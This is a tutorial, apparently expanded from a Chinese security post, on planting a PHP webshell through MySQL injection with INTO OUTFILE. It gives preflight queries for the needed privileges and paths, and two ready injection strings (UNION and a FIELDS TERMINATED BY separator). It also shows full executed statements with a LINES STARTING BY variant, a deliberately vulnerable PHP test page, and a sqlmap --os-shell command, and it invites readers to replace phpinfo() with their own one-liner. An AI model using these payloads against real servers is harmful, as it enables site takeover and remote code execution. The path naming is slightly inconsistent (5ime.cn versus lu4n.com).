
Two ways to write a one-line webshell through MySQL injection and get a shell quickly
Exploitation requires all of the following:
- A database account with the FILE privilege (root normally has it; INTO OUTFILE checks the FILE privilege, not the account name)
- magic_quotes_gpc off, so single quotes survive (the payload and the file path are both string literals; the setting was removed in PHP 5.4, so on modern PHP it is simply absent)
- The absolute path of the web root (optional for reading files, mandatory for writing them)
- secure_file_priv not configured (--secure-file-priv on the mysqld command line, or secure_file_priv in my.cnf): an empty value allows writes anywhere the mysqld OS user can write, a directory value restricts writes to that directory, and NULL disables file export altogether
In addition, the file is created by the mysqld OS user (usually "mysql"), so the target directory must be writable by that user, and the target file must not already exist because INTO OUTFILE never overwrites.
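To verify those conditions from the injection point before attempting a write, the queries below can be run through a UNION (or directly in a mysql client while setting up a lab). This is an added example, not code from the original post; the web-server config path and the web-root directory in it are assumptions.

```sql
-- Added example: preflight checks for INTO OUTFILE. Each SELECT can be
-- wrapped in the post's UNION form, e.g.
--   id=2) union select 1,2,3,4,5,6,7,@@secure_file_priv%23

-- 1. FILE privilege: this, not the account name, is what INTO OUTFILE checks.
SELECT grantee, privilege_type
  FROM information_schema.user_privileges
 WHERE privilege_type = 'FILE';
-- Equivalent when the mysql schema itself is readable:
SELECT user, host, file_priv FROM mysql.user;

-- 2. secure_file_priv: '' = write anywhere mysqld can, a directory = only
--    there, NULL = file export disabled. MySQL 5.7.6+ no longer defaults
--    to '' (official Linux packages use /var/lib/mysql-files, other builds NULL).
SELECT @@secure_file_priv;

-- 3. Absolute paths: install-layout hints, plus a web-server config file that
--    usually names the document root (the config path is an assumption).
SELECT @@version_compile_os, @@basedir, @@datadir;
SELECT LOAD_FILE('/etc/apache2/sites-enabled/000-default.conf');

-- 4. Trial write. The file is created by the mysqld OS user (usually "mysql"),
--    so the directory must be writable by that user and the name must be new.
--    "Can't create/write to file" or "File ... already exists" means one of
--    the write-side conditions failed (the web-root path is an assumption).
SELECT 'outfile-ok' INTO OUTFILE '/home/wwwroot/lu4n.com/outfile_test.txt';
```

A NULL from step 2 ends the exercise on that host; a directory value means only paths inside it are writable, which is rarely the web root. Step 4 is worth running with a harmless text file first, since a failed .php write leaves nothing behind to diagnose.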
1. union

```sql
id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>' into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php'%23
```

`<? phpinfo(); ?>` is the content that gets written; replace it with your own one-liner (use the full `<?php` tag unless you know short_open_tag is enabled on the target). `/home/wwwroot/5ime.cn/luan_phpinfo.php` is a filename of your choosing appended to a directory that already exists under the web root: the directory must exist and the file must not, because INTO OUTFILE refuses to overwrite. The `)` closes the parenthesis of the original query and `%23` is a URL-encoded `#` that comments out whatever follows it; the seven numeric columns pad the UNION to the original query's column count, so the payload lands in the last column.
2. no union

```sql
id=2) into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php' fields terminated by '<? phpinfo(); ?>'%23
```

I first saw the second method in a post on 吐司 (t00ls) dated 2015-1-24; 吐司 really does have a lot of skilled people. The result:

The second method gets a shell by injecting the field separator: mysqld writes the FIELDS TERMINATED BY string verbatim between every pair of adjacent columns of the selected row, so the query result must have more than one column (with a single column no separator is emitted at all). Ordinary injection points usually satisfy this.
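The two injections above, written out as the complete statements the server ends up executing, plus a single-column variant the post does not cover. This is an added example, not the original post's code: the table `news`, its 8-column layout, the parenthesised WHERE clause and the output paths are assumptions, and the full `<?php` tag is used in place of the post's short tag.

```sql
-- Added example. Assumed vulnerable query: SELECT * FROM news WHERE (id=<input>)
-- with 8 columns. The injected ')' closes the WHERE parenthesis and the
-- trailing %23 (#) comments out the rest, which is why each statement below
-- simply ends after the INTO OUTFILE clause.

-- Method 1 (UNION): the payload travels as a column value. Every row of the
-- result is written, so the genuine id=2 row precedes the payload row in the
-- file; PHP echoes the text outside the tags and executes the <?php ... ?>
-- block. With the default export options mysqld backslash-escapes tabs,
-- newlines and backslashes inside the data, so keep the one-liner on one line.
SELECT * FROM news WHERE (id=2)
UNION SELECT 1,2,3,4,5,6,7,'<?php phpinfo(); ?>'
  INTO OUTFILE '/home/wwwroot/lu4n.com/luan_phpinfo.php';

-- Method 2 (no UNION): the payload is the field separator and is written
-- verbatim between adjacent columns, i.e. 7 times for an 8-column row.
-- It needs at least 2 columns, because no separator is emitted for one.
SELECT * FROM news WHERE (id=2)
  INTO OUTFILE '/home/wwwroot/lu4n.com/luan_phpinfo2.php'
  FIELDS TERMINATED BY '<?php phpinfo(); ?>';

-- Single-column variant (goes beyond the post): LINES STARTING BY is written
-- at the start of every output line regardless of the column count.
SELECT title FROM news WHERE (id=2)
  INTO OUTFILE '/home/wwwroot/lu4n.com/luan_phpinfo3.php'
  LINES STARTING BY '<?php phpinfo(); ?>';
```

With Method 2 the block is executed once per separator, so a payload that has side effects (writing a file, for instance) should be idempotent; phpinfo() simply renders seven times. Both methods keep the column values of the id=2 row in the file as harmless text, which is also the easiest way to confirm which row was written.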
Using sqlmap
Taking luan_test.php as the example:
```php
<?php
// Deliberately vulnerable test target: it blocks the keyword "union" so that
// only the non-union INTO OUTFILE technique works against it.
// mysqli is used because the mysql_* extension was removed in PHP 7.
$link = @mysqli_connect("localhost", "root", "", "mysql");
if (!$link) {
    die("connect failed: " . mysqli_connect_error());
}
$user = strtolower($_GET['user'] ?? '');
if (strpos($user, "union") === false) {
    // Unescaped input is concatenated straight into the query: the injection point.
    $sql = "SELECT * FROM user where user='{$user}'";
    echo $sql . '<br>';
    mysqli_query($link, $sql);
    // Echoing the MySQL error makes this an error-based target as well.
    echo mysqli_errno($link) . ": " . mysqli_error($link) . " ";
}
?>
```
In my tests, the latest sqlmap does in fact support this method:

```shell
C:\luan\sqlmap>python sqlmap.py -u "http://192.168.2.200/luan_test.php?user=root" --os-shell
```


But if --os-shell cannot be used, sqlmap does have a file-write option (--file-write together with --file-dest); in my tests it did not succeed, which is to say sqlmap can only upload its own webshell.


If you prefer tools and run into this situation, just use sqlmap with --os-shell and then work through the webshell that sqlmap uploads.